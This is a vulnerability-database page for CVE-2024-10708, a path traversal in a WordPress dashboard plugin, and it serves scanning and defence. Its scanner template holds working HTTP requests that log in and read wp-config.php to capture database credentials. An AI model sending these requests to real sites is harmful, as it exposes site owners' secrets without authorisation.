| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2024-10708 | 10 Dec 202406:01 | – | circl | |
| WordPress plugin System Dashboard 安全漏洞 | 10 Dec 202400:00 | – | cnnvd | |
| CVE-2024-10708 | 10 Dec 202406:00 | – | cve | |
| CVE-2024-10708 System Dashboard < 2.8.15 - Admin+ Path Traversal | 10 Dec 202406:00 | – | cvelist | |
| CVE-2024-10708 | 10 Dec 202406:15 | – | nvd | |
| CVE-2024-10708 | 10 Dec 202406:15 | – | osv | |
| WordPress System Dashboard Plugin < 2.8.15 is vulnerable to Path Traversal | 21 Nov 202400:00 | – | patchstack | |
| WordPress System Dashboard plugin < 2.8.15 - Admin+ Path Traversal vulnerability | 21 Nov 202409:10 | – | patchstack | |
| PT-2024-16481 | 10 Dec 202400:00 | – | ptsecurity | |
| CVE-2024-10708 | 23 May 202508:17 | – | redhatcve |
id: CVE-2024-10708
info:
name: System Dashboard < 2.8.15 - Admin+ Path Traversal
author: 0x_Akoko
severity: medium
description: |
The System Dashboard WordPress plugin before 2.8.15 does not validate user input used in a path, which could allow high privilege users such as admin to perform path traversal attacks an read arbitrary files on the server
impact: |
Authenticated administrators can exploit path traversal through the filename parameter in the sd_viewer action to read arbitrary server files including wp-config.php, exposing database credentials and sensitive configuration data.
remediation: |
Fixed in 2.8.15
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-10708
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/system-dashboard/system-dashboard-103-local-file-inclusion
- https://wpscan.com/vulnerability/61d750a5-8c2c-4c94-a1a9-6a254c2a0d03/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
cvss-score: 4.9
cve-id: CVE-2024-10708
cwe-id: CWE-22
epss-score: 0.0203
epss-percentile: 0.78702
cpe: cpe:2.3:a:bowo:system_dashboard:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: bowo
product: system_dashboard
framework: wordpress
fofa-query: body="/wp-content/plugins/system-dashboard/"
tags: cve,cve2024,wpscan,wordpress,wp-plugin,lfi,auth,system-dashboard,vuln
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, "wordpress_logged_in")
condition: and
internal: true
- raw:
- |
GET /wp-admin/admin-ajax.php?action=sd_viewer&filename=/wp-config.php&load_plugins[]=system-dashboard/system-dashboard.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100f7346b27d093182c6dcf5f2ac2660dee614508ce89517a143e2eb9b30efe8fc0022100aa8f330d0fd5beba030ba2de64a728246947bad73e74cdf578c18164dcf581e1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation